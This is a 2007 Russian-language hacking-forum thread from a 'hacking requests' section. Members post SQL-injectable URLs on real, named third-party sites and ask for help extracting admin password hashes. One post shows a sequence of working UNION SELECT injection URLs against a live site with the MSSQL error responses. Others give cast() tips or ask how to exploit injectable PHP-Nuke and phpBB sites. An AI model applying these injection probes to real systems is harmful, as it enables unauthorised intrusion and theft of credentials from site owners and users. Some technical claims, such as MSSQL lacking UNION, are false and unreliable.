ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > SЕО/Финансовые задачи/Социальные сети > Покупка, Продажа, Обмен > Просьбы о взломах
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Помощь Sql Иньекции.
  #1  
Старый 27.03.2007, 22:12
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


Exclamation Помощь Sql Иньекции.

Если вы хотите что бы вам быстро оказали помощь оставляте ссыки на предпологаемые вами sql иньекции.

Здесь оставляем ссылки вида.

PHP код:
http://site.ru/index.php?id=[sql] 
Все остальные ссылки рассматривать не будут.

Последний раз редактировалось [ cash ]; 27.03.2007 в 23:27..
 

  #2  
Старый 27.03.2007, 22:44
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию

ссыки? Блин, Кэш, глаза чуть не сломал пока читал месадж, исправь ошибки, не в обиду

ЗЫ

__http://prod1.cmj.com/articles/display_article.php?id=6547215'


16 колонок, вывод не осилил

Ошибки разные, отсюда делаю вывод что юнион должен работать, иначе бы типы данных игнорились:
Код:
__http://prod1.cmj.com/articles/display_article.php?id=-6547215'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
Implicit conversion from datatype 'VARCHAR' to 'INT' is not allowed. Use the CONVERT function to run this query

__http://prod1.cmj.com/articles/display_article.php?id=-6547215+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,nulll--
Invalid column name 'nulll'=====================================================================:::

__http://prod1.cmj.com/articles/display_article.php?id=-6547215+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--
Column of type (BIT) does not allow nulls. It may not be compared with null

__http://prod1.cmj.com/articles/display_article.php?id=-6547215+union+select+null,null,null,null,null,null,null,null,null,0,null,null,null,null,null--
Implicit conversion from datatype 'VARCHAR' to 'INT' is not allowed. Use the CONVERT function to run this query

Последний раз редактировалось Thanat0z; 27.03.2007 в 22:49..
 

  #3  
Старый 27.03.2007, 23:07
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

Это Mssql. Учитывай это.
Выводимые данные не соответсвуют кодировке.
 

  #4  
Старый 28.03.2007, 01:42
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию

Цитата:
Сообщение от [ cash ]  
Это Mssql. Учитывай это.
Выводимые данные не соответсвуют кодировке.
нужно использовать convert/aes_decrypt?
 

  #5  
Старый 28.03.2007, 12:10
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

cast(TABLE as nvarchar)
cast(TABLE as int)
 

  #6  
Старый 28.03.2007, 15:09
Alexsize
Fail
Регистрация: 17.09.2005
Сообщений: 2,242
Провел на форуме:
9089375

Репутация: 4268


По умолчанию

http://forum.pacan.net/kb.php?mode=cat&cat=23'

Не могу добраться до хэшей админа. Пхпбб.
 

Помогите заюзать найденный SQL-inj
  #7  
Старый 31.03.2007, 21:17
[x26]VOLAND
Moderator - Level 7
Регистрация: 07.06.2006
Сообщений: 556
Провел на форуме:
7549607

Репутация: 2702


Отправить сообщение для [x26]VOLAND с помощью ICQ Отправить сообщение для [x26]VOLAND с помощью AIM
По умолчанию Помогите заюзать найденный SQL-inj

http://portal.migtel.ru/modules.php?name=Search
Если в поле поиска забито что-товроде 99' скрипт выдаёт явную ошибку. Из префиксов видно что cms - Nuke.
Помогите составить запрос для вытаскивания хэша админа.
 

  #8  
Старый 08.04.2007, 15:47
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248

Репутация: 668


Отправить сообщение для Doom123 с помощью ICQ
По умолчанию

а теперь признайтесь ктио туда троянца залил
 

  #9  
Старый 10.04.2007, 16:40
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

офтоп
Тоже вот не хотелось новую тему создавать.
офтоп
На счет MSSQL, делаю такой вот запросик : ' UNION SELECT TOP 1 TABLE_NAME FROM users (post запросе) дайет вот такой ответ:Microsoft JET Database Engine ошибка '80040e14'.
В таслицах или запрофах, высранных в запрофе на осъединение, не фовпадает чифло фтолсцов
(повторил слово в слово!). Ну короче неправельно выбрано кол. столбцов, насколько я понял из
MS.Press.MCAD.MCSE.MCDB - TOPом и задается кол. столбцов,тока сколька не cтавил TOP, все равно ему мало,короче не правильный запросик, подскажите че нибудь.
Да насчет INFORMATION_SCHEMA.TABLES в запросе - говорит что "таблицы таблиц" нету.

Последний раз редактировалось AkyHa_MaTaTa; 10.04.2007 в 17:14..
 

  #10  
Старый 10.04.2007, 17:19
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
В таслицах или запрофах, высранных в запрофе на осъединение, не фовпадает чифло фтолсцов
жесть
Цитата:
На счет MSSQL, делаю такой вот запросик : ' UNION SELECT TOP 1 TABLE_NAME FROM users
0_о в MSSQL нет оператора UNION
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ПомогитЕ !!! подалуста найти кряк гейлордфакерЪ Болталка 2 30.08.2007 14:48
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ